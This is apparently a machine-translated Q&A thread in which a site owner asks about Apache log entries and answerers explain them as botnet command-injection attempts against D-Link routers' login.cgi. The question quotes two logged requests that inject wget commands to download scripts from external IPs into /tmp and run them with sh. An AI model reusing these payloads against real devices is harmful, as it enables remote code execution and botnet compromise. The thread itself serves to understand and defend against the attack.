web-dev-qa-db-ja.com

誰かが私をハックしようとしているだけですか? login.cgi + wget

私はApacheに新しいサーバーを構築しています。実際に学習しているので、別のことを試みています。私のセキュリティシステムは既に完了していますが、もちろん何かを見逃している可能性があります。そうでない場合でも、今日では1つのシステムでは100%保護できないことを理解しています。だから、なぜ私が私のログにこれを受け取ったからといって、誰かが私を試したと思うのですか?

1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"

41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566

もっとありました。この誰かがエラー400を受け取っていることを理解しています。ですから、実際、私の質問は、彼らが私を試してみるかどうかではありません。私がそう思うのは、私のサイトへの通常のリクエストのようではないからです。このリクエストの説明を知り、理解してもらいたいのです。彼らが実際に何をしようとしているのか、私のログインシステムを見つけてそれを誰かに送信しましたか?

追伸wgetを使用すると、いくつかのWebサイトをダウンロードできることをすでに知っています。また、login.cgiはcookieベースの認証プログラムです。

ありがとうございました!

securityapache-2.4monitoringloginhacking
1
Robbie KN

歓迎されない訪問者は、サーバーにスクリプトをダウンロードして実行しようとする試みを隠そうとはしていません。

彼はあなたがそのようなlogin.cgiスクリプトが適切に配置されている場合、入力も適切に渡されないため、アポストロフィ(%27エンコードされたログ)。あなたはおそらくそのような脆弱なスクリプトを持っていませんが、HTTPコード400が常に影響を受けていないことを意味するとの仮定は根拠がありません。

これは無作為の標的の大きなグループに向けられた無人攻撃である可能性が高いです。ダウンロードして実行することを意図したスクリプトに何が含まれていたのかを推測することしかできません。通常、スクリプトを配信するサーバーは、これまでに攻撃が成功したと想定しているか、調査中かによって、異なるスクリプト(+)を提供するため、それを判断できないと想定しても安全です。

攻撃者もコード実行の可能性は低いと考えていた可能性があり、その代わり、攻撃者はシステムに関する情報を収集しただけでした。インターネットに接続するすべてのデバイスは、このような要求を定期的に想定する必要があり、Webサーバー上のすべてのスクリプトは、そのようなことを心配する必要がない方法で作成する必要があります。

(+)なぜ攻撃者は異なるスクリプトを提供するのですか?妥協後の特権昇格の調査を困難にするため。スクリプトは後でメモリから失われる可能性が高いため、攻撃者が被害者が後でスクリプトを取得できないようにすることは意味があります。 方法攻撃者は異なるスクリプトを提供しますか?彼は、Webサーバーが攻撃の直後に、攻撃されたマシンのIPからの攻撃ペイロードのみで応答するようにします。攻撃は瞬時に成功するか失敗するかのいずれかであるため、スクリプトのその後の取得は、被害者の科学捜査チームまたはセキュリティ研究者に起因する可能性があります。これは新しいメカニズムでも純粋に理論的なメカニズムでもありません。2016年に、IPに基づいて異なるペイロードを受信しました(1つのスクリプトは空で、もう1つは第3ステージのペイロードをロードするコマンドを含みます)。

6
anx

個人的な攻撃ではありません。ボットネットは、可能性のあるすべてのIPアドレスを攻撃するために使用される可能性があります。

login.cliパラメータを使用するスクリプトcliは、D-Linkルーターをターゲットにしているようです。これはおそらく D-Link DSL-2750Bのバリアントです-OSコマンドインジェクション

このモジュールは、D-Link DSL-2750Bデバイスのリモートコマンドインジェクションの脆弱性を不正利用します。脆弱性は、「ayecli」バイナリを呼び出すために直接使用される「cli」パラメータを介して悪用される可能性があります。脆弱なファームウェアは1.01から1.03までです。

NginxやApacheなどのWebサーバー用のブロックリストのコレクションがあり、そのような要求をすべてブロックするために使用できます。トラフィックによっては、これを行うと便利です。特に、トラフィックが少ない小さなプライベートWebサイトがある場合に役立ちます。

1
kap

この投稿は1年以上前のものであることはわかっていますが、これをさらに明確にすることができます。

それは確かにボットネットの一部です。ダウンロードしようとしているスクリプトは、ダウンロードを試み、実行可能なビット/権限をダウンロードされたファイル(ドロップされたファイル)に追加し、実行してからファイルを削除しようとするドロッパーです。

このドロッパーの新しいバージョンを分析しましたが、これはエンコードされていないシェルスクリプトです。このネットワークは、2020年に近づくにつれ、今日もまた活発になっています。

異なるスクリプトを使用するという問題に関する限り、開発者は異なるオペレーティングシステムで実行するために個別のスクリプトを作成することができます。まるで誰かがこのボットネットを再パッケージして再配布しようとしているようです。ウイルスの合計 グラフ は、この特定のボットネットの新しいアクティビティを示しています。

0
billy